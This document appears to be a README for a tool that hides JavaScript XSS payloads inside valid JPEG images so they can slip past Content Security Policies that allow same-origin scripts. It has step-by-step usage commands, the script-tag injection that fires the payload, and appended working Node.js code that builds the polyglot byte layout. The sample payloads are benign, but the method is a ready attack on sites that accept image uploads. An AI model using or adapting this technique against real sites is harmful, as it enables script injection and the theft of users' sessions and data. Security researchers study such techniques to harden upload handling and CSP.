YouGina

JPGPolyglotGenerate

A tool inspired by: https://portswigger.net/research/bypassing-csp-using-polyglot-jpegs

This tool automates the process of generating a polyglot JPG image that carries an XSS payload. The resulting file is a working JPG image that any file parser should accept as valid, while the JavaScript payload embedded in it can still be fired by a specially crafted XSS injection. This is useful if you have limited space to insert your payload and a Content Security Policy blocks scripts from external origins but allows scripts from the origin that hosts your uploaded image (for example a script-src 'self' policy on a site that lets you upload images).

It consists of a single JavaScript file that inserts specific bytes in specific places so that both formats keep working. It comes down to abusing the JPG file header, the JPG comment/segment functionality and JavaScript comments: read as ISO-8859-1 text, the first header bytes form a JavaScript identifier followed by the start of a comment, the payload is placed inside a header segment that image parsers skip but that JavaScript sees once the comment closes, and the remaining image data is wrapped in another comment. For the technical details of the process see the referenced article above.

To use the tool, follow this process:

git clone https://github.com/YouGina/JPGPolyglotGenerate.git

Download or make a normal JPG file, say input.jpg

Make sure it does not already contain the byte sequence 2a 2f (the characters */, which would close a JavaScript comment early and break the payload). A byte-accurate way to check this is:

grep -a -c '\*/' input.jpg

(The plain xxd input.jpg | grep "2a2f" variant misses a */ whose two bytes land in different xxd groups or on different output lines.) If the command prints 0, continue; otherwise choose another image.

Execute the following command to insert the payload into the image (on systems where the Node.js binary is called node rather than nodejs, use node):

nodejs jpg-polyglot-generate.js input.jpg output.jpg 'alert("Payload");'

To insert a payload from a file, you can also do:

nodejs jpg-polyglot-generate.js input.jpg output.jpg "$(tr -d '\n' < file.js)"

The payload must not contain any newlines, so they are stripped here with tr. (sed 's/\n//g' does not do this: sed processes one line at a time and the terminating newline is never part of the text it matches.) Make sure your JavaScript still works once it is a single line: terminate statements with semicolons rather than relying on line breaks, do not use // line comments (everything after the first one would be commented out), and never use */ anywhere in the payload.

To execute the JavaScript inside the image file, inject a script tag that loads the upload and decodes it as ISO-8859-1, so that the leading JPG header bytes become valid identifier characters instead of UTF-8 decoding errors:

<script charset="ISO-8859-1" src="/upload-path/output.jpg"></script>

This only works if the CSP allows scripts from the origin of the upload path and the server does not send X-Content-Type-Options: nosniff on the image response; with nosniff, browsers refuse to execute a script whose MIME type is not a JavaScript type.

The file should still work as a normal image too:

<img src="/upload-path/output.jpg" />
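The following is an added example written for this page; it is not the JPGPolyglotGenerate source. It reproduces the layout from the referenced article in Node.js: the APP0 segment length is set to 0x2F2A so its two bytes read as "/*", the segment is padded with NUL bytes, "*/=<payload>/*" is appended at the end of the segment, and "*/" is appended after the end of the file. It then checks both views: a marker walk for the image parser, and an ISO-8859-1 decode that is run as JavaScript, which is what the charset attribute on the script tag does. It generalises the article slightly in accepting any APPn marker (FF E0 to FF EF) after SOI, since all of those bytes are Latin-1 letters; the sample JPEG is a constructed structural skeleton, not a decodable picture, and all function and variable names are this example's own.

```javascript
// Added example, not the JPGPolyglotGenerate source: JPEG/JavaScript polyglot
// layout from the PortSwigger technique. Assumptions (this example's own):
// the input starts with SOI (FF D8) directly followed by an APPn segment
// (FF E0..FF EF); the new segment length 0x2F2A reads as "/*" in Latin-1.
const SEG_LEN = 0x2f2a;                          // big-endian length bytes == "/*"
const CLOSE = Buffer.from('*/', 'latin1');       // bytes 2A 2F, the sequence to avoid

// Byte-accurate version of the "does the image already contain */" check.
function containsCommentClose(buf) {
  return buf.includes(CLOSE);
}

// Build: ÿØÿà/*<original APPn body + NUL padding>*/=<payload>/*<rest of image>*/
function makePolyglot(jpeg, payload) {
  if (jpeg[0] !== 0xff || jpeg[1] !== 0xd8) throw new Error('no SOI marker');
  if (jpeg[2] !== 0xff || jpeg[3] < 0xe0 || jpeg[3] > 0xef) {
    throw new Error('second marker is not APPn (FF E0..FF EF)');
  }
  const origLen = jpeg.readUInt16BE(4);          // JPEG lengths include the 2 length bytes
  const body = jpeg.subarray(6, 4 + origLen);    // original segment body (JFIF, Exif, ...)
  const rest = jpeg.subarray(4 + origLen);       // every segment after the APPn one
  const payloadBuf = Buffer.from(payload, 'latin1');
  for (const part of [body, rest, payloadBuf]) {
    if (containsCommentClose(part)) throw new Error('input or payload already contains "*/"');
  }
  // "*/" ends the header comment, "=" assigns to the identifier ÿØÿà, "/*" hides the image data.
  const tail = Buffer.concat([Buffer.from('*/=', 'latin1'), payloadBuf, Buffer.from('/*', 'latin1')]);
  const padLen = SEG_LEN - 2 - body.length - tail.length;
  if (padLen < 0) throw new Error('payload does not fit in a 0x2F2A-byte segment');
  const len = Buffer.alloc(2);
  len.writeUInt16BE(SEG_LEN);
  return Buffer.concat([
    Buffer.from([0xff, 0xd8, 0xff, jpeg[3]]), len,   // SOI + APPn marker + "/*"
    body, Buffer.alloc(padLen), tail,                // padded segment, payload at its end
    rest, CLOSE,                                     // image data, then "*/" after EOI
  ]);
}

// Image view: walk the marker segments up to SOS the way a decoder does.
function listSegments(buf) {
  const segments = [];
  let i = 2;                                       // skip SOI
  while (i + 4 <= buf.length && buf[i] === 0xff) {
    const marker = buf[i + 1];
    if (marker === 0xda) { segments.push({ marker, length: null }); break; }  // SOS
    const length = buf.readUInt16BE(i + 2);
    segments.push({ marker, length });
    i += 2 + length;
  }
  return segments;
}

// Script view: what <script charset="ISO-8859-1"> hands to the JavaScript parser.
function asScript(buf) {
  return buf.toString('latin1');
}

// Constructed input: a structurally valid JPEG skeleton (SOI, JFIF APP0, DQT, SOS, EOI).
// It is not a decodable picture; in practice read a real file with fs.readFileSync.
const SAMPLE_JPEG = Buffer.concat([
  Buffer.from([0xff, 0xd8]),                                           // SOI
  Buffer.from([0xff, 0xe0, 0x00, 0x10]),                               // APP0, length 16
  Buffer.from('JFIF\0\x01\x01\x00\x00\x01\x00\x01\x00\x00', 'latin1'), // 14-byte JFIF body
  Buffer.from([0xff, 0xdb, 0x00, 0x04, 0x00, 0x10]),                   // DQT (stub body)
  Buffer.from([0xff, 0xda, 0x00, 0x02]),                               // SOS
  Buffer.from([0x12, 0x34, 0x56]),                                     // entropy-coded data
  Buffer.from([0xff, 0xd9]),                                           // EOI
]);

const polyglot = makePolyglot(SAMPLE_JPEG, 'globalThis.polyglotFired = "yes"');
console.log(listSegments(polyglot));          // APP0 now 0x2F2A long, DQT and SOS intact
console.log(asScript(polyglot).slice(0, 6));  // the script starts with ÿØÿà/*
```

To produce a real file, pass fs.readFileSync('input.jpg') to makePolyglot and write the result with fs.writeFileSync; a JPEG whose second marker is not an APPn segment (for example one starting with a DQT marker) is rejected rather than silently mangled, and the payload plus the original segment body must fit in the 12072 usable bytes of the 0x2F2A-byte segment.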

Reach me via:

- info@yougina.com
- @YouGina

© 1991 - 2023